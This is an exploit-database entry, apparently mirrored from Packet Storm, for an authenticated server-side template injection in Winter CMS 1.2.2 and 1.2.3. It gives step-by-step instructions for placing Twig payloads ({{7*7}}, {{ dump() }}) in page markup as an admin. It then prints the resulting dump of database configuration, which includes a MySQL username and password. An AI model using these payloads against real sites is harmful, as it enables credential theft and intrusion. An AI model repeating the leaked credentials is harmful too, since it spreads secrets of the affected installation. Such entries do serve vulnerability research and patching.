Share
## https://sploitus.com/exploit?id=PACKETSTORM:177631
# Exploit Title: Winter CMS 1.2.2 / 1.2.3 - Server-Side Template Injection (SSTI) (Authenticated)  
# Exploit Author: tmrswrr  
# Date: 12/05/2023  
# Vendor: https://wintercms.com/  
# Software Link: https://github.com/wintercms/winter/releases/v1.2.2  
# Vulnerable Version(s): 1.2.2 / 1.2.3  
#Tested : https://www.softaculous.com/demos/WinterCMS  
  
  
1 ) Login with admin cred and click CMS > Pages field > Plugin components >   
https://demos6.demo.com/WinterCMS/backend/cms#secondarytab-cmslangeditormarkup  
2 ) Write SSTI payload : {{7*7}}  
3 ) Save it , Click Priview :   
https://demos6.demo.com/WinterCMS/demo/plugins  
4 ) You will be see result :   
49  
Payload :  
{{ dump() }}  
Result :  
  
"*::database" => array:4 [▼  
"default" => "mysql"  
"connections" => array:4 [▼  
"sqlite" => array:5 [▼  
"database" => "/home/soft/public_html/WinterCMSmcviotyn9i/storage/database.sqlite"  
"driver" => "sqlite"  
"foreign_key_constraints" => true  
"prefix" => ""  
"url" => null  
]  
"mysql" => array:15 [▼  
"charset" => "utf8mb4"  
"collation" => "utf8mb4_unicode_ci"  
"database" => "soft_pw3qsny"  
"driver" => "mysql"  
"engine" => "InnoDB"  
"host" => "localhost"  
"options" => []  
"password" => "8QSz9(pT)3"  
"port" => 3306  
"prefix" => ""  
"prefix_indexes" => true  
"strict" => true  
"unix_socket" => ""  
"url" => null  
"username" => "soft_pw3qsny"  
]  
"pgsql" => array:12 [▶]  
"sqlsrv" => array:10 [▶]  
]  
"migrations" => "migrations"  
"redis" => array:4 [▼  
"client" => "phpredis"  
"options" => array:2 [▼  
"cluster" => "redis"  
"prefix" => "winter_database_"  
]  
"default" => array:5 [▼  
"database" => "0"  
"host" => "127.0.0.1"  
"password" => null  
"port" => "6379"  
"url" => null  
]  
"cache" => array:5 [▼  
"database" => "1"  
"host" => "127.0.0.1"  
"password" => null  
"port" => "6379"  
"url" => null  
]  
]  
]  
]